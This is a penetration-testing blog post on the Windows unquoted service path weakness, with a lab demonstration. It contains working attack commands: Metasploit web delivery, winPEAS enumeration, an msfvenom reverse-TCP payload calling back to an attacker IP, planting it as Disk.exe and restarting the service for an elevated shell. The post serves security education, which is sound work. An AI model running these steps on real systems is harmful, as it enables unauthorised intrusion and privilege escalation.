SecurityNguyen
Posts Tags About Categories
SecurityNguyen

Contents

Unquoted Service Path - Windows Escalation

Nguyen Nguyen included in Penetration Testing
   707 words   4 minutes 

Note: If you need to zoom in, you can click on the image.

Background Information:

An unquoted Service Path occurs when Service Control Manager misinterprets the Path to the executable (that the service used) due to the spaces and lack of "" (quotation mark) surrounding the Path.

Here are some of the following examples:
Proper executable Path: "C:\Program Files\RealVNC\VNC Server\vncserver.exe" -service

Incorrect executable Path: C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe

Why are spaces and quotation mark a big deal?
When you send a command, spaces are used as argument separators unless they are part of a quoted string.

Here is how a service control manager would evaluate a binary path:
We will use this as our example: C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe.

  1. First, SCM will look for: C:\MyPrograms\Disk.exe with argument of Sorter and Enterprise\bin\disksrs.exe. If it can't find Disk.exe, it moves to step two.

  2. SCM will look for: C:\MyPrograms\Disk Sorter.exe with argument of Enterprise\bin\disksrs.exe. If SCM can't find C:\MyPrograms\Disk Sorter.exe, then it moves to step 3.

  3. SCM will look for: C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe. Usually, that is the end of the search.
Thus, can you see how long we had to wait before SCM found the application? The attacker can abuse this by creating a malicious file, renaming it to Disk.exe, and putting it in the same location, allowing the malicious program to run first, then the legit program. Let's see it in action, shall we?

Demonstration

First, I will install this Windows Enumeration Script (winPEAS) that finds potential escalation privileges. Here is the link to the script: https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS.
To deliver this script to the target windows. I will use the Web Delivery Module in Metasploit.

After running, Metasploit should generate a shell code. Paste that shellcode in the Windows command line, and Metasploit should establish a connection to the Windows. Once Metasploit has established a connection with the Command Shell. We can upgrade the shell to a meterpreter using the command: sessions -u 1

We will go inside session two using: sessions -i 2. Then begin our process of transferring the script to the target machine. The command we are going to use: is: upload binary_path.

My winPEASx64 binary is in /home/kali/Downloads. I will use this command: upload /home/kali/Downloads/winPEASx64.exe. Then I will spawn a shell and execute the enumeration script to see where to perform Unquoted service path vulnerability.

Some notes about winPEAS:
You can get the help (man) page using .\winPEASx64.exe help. which allows you to specify the info you’re looking for.

Note: if you don’t specify what you’re looking for and plain out run it, The script will look for all the information listed above. Since we will work with services, I’m interested in servicesinfo. Let’s run it using .\winPEASx64 servicesinfo and get it to save the output to a file so we can look at it later. At the end of the command, we can do: > service_info.txt.

Terminal version:

Notepad version:

The terminal picture above says Disk Sorter Enterprise - No Quotes and Space Detected. This means we can attack Unquoted Service Path on this service. To get further detail on service, we can run: sc qc "Disk Sorter Enterprise"

BINARY_PATH_NAME point to the executable that the service is running, and SERVICE_START_NAME point to the users.

The plan is to replace the binary with our malicious executable.

The next step is to create a listener in our Metasploit. We can do this by the multi/handler option. I'm not going to go over the steps to do that.

Then we will create our malicious program, which connects to our listener. For this, I will use MSFvenom.
Command: msfvenom -p windows/shell_reverse_tcp LHOST=10.13.29.190 LPORT=6777 -f exe-service -o poison_ivy.exe

Now, it is time to transfer the poison_ivy.exe to the target machine using: upload /home/kali/Downloads/poison_ivy.exe. Once we transfer poison_ivy.exe to the machine. We have to move to C:\MyPrograms\ directory and move poison_ivy.exe to here and rename the file to Disk.exe.

We will run this command: move C:\Users\thm-unpriv\poison_ivy.exe Disk.exe. Then grant Full Access (Everyone) - So anyone can run it. Using this command: icalcs C:\MyPrograms\Disk.exe /grant Everyone:F

Now, restart the service by turning it off and on.
sc stop "disk sorter enterprise"
sc start "disk sorter enterprise"
Then you should get a shell. Congratulations, we just escalated our privilege.

That’s all. Thanks for reading.

Updated on 2023-07-04
 Red TeamWindows
Back | Home